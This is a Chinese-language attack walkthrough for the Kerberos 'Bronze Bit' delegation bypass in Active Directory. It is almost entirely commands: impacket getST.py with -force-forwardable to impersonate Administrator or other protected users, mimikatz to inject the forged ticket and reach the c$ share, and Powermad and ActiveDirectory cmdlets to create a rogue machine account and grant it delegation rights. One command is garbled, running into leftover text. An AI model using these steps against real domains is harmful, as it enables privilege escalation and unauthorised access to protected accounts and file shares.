攻击者可以冒充不允许被委派的用户。这包括受保护用户组的成员和任何其他明确配置为敏感且无法委派的用户。
要求：
服务帐户的密码哈希
服务帐户带有Constrained Delegation或Resource Based Constrained Delegation
https://github.com/SecureAuthCorp/impacket/pull/1013
攻击 #1 - 绕过Trust this user for delegation to specified services only – Use Kerberos only保护并冒充受委托保护的用户。
forwardable flag 仅受使用服务帐户密码的票证加密保护
>getST.py -spn cifs/Service2.test.local -impersonate Administrator -hashes <LM:NTLM hash> -aesKey <AES hash> test.local/Service1 -force-forwardable -dc-ip <Domain controller> # -> Forwardable
>getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes aad3b435b51404eeaad3b435b51404ee:7c1673f58e7794c77dead3174b58b68f -aesKey 4ffe0c458ef7196e4991229b0e1c4a11129282afb117b02dc2f38f0312fc84b4 test.local/Service1 -force-forwardable
加载票据
.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit
访问c$
>ls \\service2.test.local\c$
攻击 #2 - 向 AD 中的一个或多个对象写入权限
创建一个新机器账户
>Import-Module .\Powermad\powermad.ps1
>New-MachineAccount -MachineAccount AttackerService -Password $(ConvertTo-SecureString 'AttackerServicePassword' -AsPlainText -Force)
>.\mimikatz\mimikatz.exe "kerberos::hash /password:AttackerServicePassword /user:AttackerService /domain:test.local" exit
设置PrincipalsAllowedToDelegateToAccount
>Install-WindowsFeature RSAT-AD-PowerShell
>Import-Module ActiveDirectory
>Get-ADComputer AttackerService
>Set-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$
>Get-ADComputer Service2 -Properties PrincipalsAllowedToDelegateToAccount

执行攻击
>python .\impacket\examples\getST.py -spn cifs/Service2.test.local -impersonate User2 -hashes 830f8df592f48bc036ac79a2bb8036c5:830f8df592f48bc036ac79a2bb8036c5 -aesKey 2a62271bdc6226c1106c1ed8dcb554cbf46fb99dda304c472569218c125d9ffc test.local/AttackerService -force-forwardableet-ADComputer Service2 -PrincipalsAllowedToDelegateToAccount AttackerService$

加载票据
>.\mimikatz\mimikatz.exe "kerberos::ptc User2.ccache" exit | Out-Null